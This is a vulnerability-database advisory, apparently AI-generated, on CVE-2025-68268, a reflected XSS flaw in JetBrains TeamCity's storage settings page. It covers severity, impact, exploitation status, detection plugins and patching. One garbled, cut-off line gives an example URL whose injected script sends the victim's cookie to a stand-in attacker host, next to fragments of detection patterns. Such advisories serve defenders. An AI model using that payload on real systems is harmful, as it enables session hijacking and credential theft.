
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68268 is a reflected Cross-Site Scripting (XSS) vulnerability in JetBrains TeamCity affecting all versions prior to 2025.11.1. The flaw exists on the storage settings page and allows unauthenticated remote attackers to inject malicious scripts that execute in the context of a victim's browser session. It was published on December 16, 2025, and patched in TeamCity 2025.11.1. The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium) per NVD, though JetBrains/ENISA rate it at 5.4 (JetBrains Advisory, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the reflected type (CAPEC-591). User-supplied input on the TeamCity storage settings page is not properly sanitized or encoded before being reflected back in the HTTP response, enabling an attacker to craft a malicious URL containing a script payload. When a logged-in user clicks such a link, the injected script executes in their browser under the TeamCity origin. No authentication is required on the attacker's side, but user interaction (clicking a crafted link) is necessary (JetBrains Advisory, Red Hat CVE).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of an authenticated TeamCity user, potentially leading to session token theft, credential harvesting, or unauthorized actions performed on behalf of the victim within the TeamCity application. Because TeamCity is a CI/CD platform with access to source code, build pipelines, and deployment credentials, account compromise via XSS could facilitate supply chain attacks or lateral movement into connected infrastructure. Confidentiality and integrity are both impacted at a low level per the CVSS assessment, with no direct availability impact (Red Hat CVE, JetBrains Advisory).
No public proof-of-concept exploit code or in-the-wild exploitation has been reported for CVE-2025-68268 as of the available data. The EPSS score is approximately 0.158%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Detection signatures are available via Nessus (plugin 279406) and Qualys (QID 530767) (Tenable Nessus, Qualys).
https://teamcity.example.com/admin/storageSettings.html?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).<script>, %3Cscript%3E, javascript:) in query parameters.JetBrains has released TeamCity 2025.11.1, which resolves this vulnerability. Organizations should upgrade to version 2025.11.1 or later as the primary remediation. No official configuration-based workaround has been published; restricting access to the TeamCity storage settings page to trusted network segments or VPN can reduce exposure as a temporary measure. Web application firewalls (WAFs) with XSS filtering rules may provide partial mitigation but should not be relied upon as a substitute for patching (JetBrains Advisory).
The vulnerability received routine coverage from security aggregators and scanner vendors shortly after disclosure. Tenable published a Nessus detection plugin (279406) and Qualys added detection (QID 530767) in December 2025. No notable researcher commentary, vendor statements beyond the patch advisory, or significant social media discussion has been identified for this specific CVE (Tenable Nessus, Qualys).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."